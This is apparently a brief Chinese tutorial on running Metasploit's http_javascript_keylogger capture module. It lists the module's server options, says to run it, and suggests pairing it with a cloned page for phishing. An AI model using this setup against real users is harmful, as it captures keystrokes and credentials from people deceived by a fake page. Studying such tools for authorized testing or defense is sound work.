server/capture/http_javascript_keylogger
DEMO使用的官方的效果图:
使用方法:
show options 看看
msf auxiliary(server/capture/http_javascript_keylogger) > options
Module options (auxiliary/server/capture/http_javascript_keylogger):
Name Current Setting Required Description
---- --------------- -------- -----------
DEMO true yes Creates HTML for demo purposes
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH / no The URI to use for this exploit (default is random)
msf auxiliary(server/capture/http_javascript_keylogger) >
然后run就可以了,这个可以配合克隆页面来进行钓鱼攻击。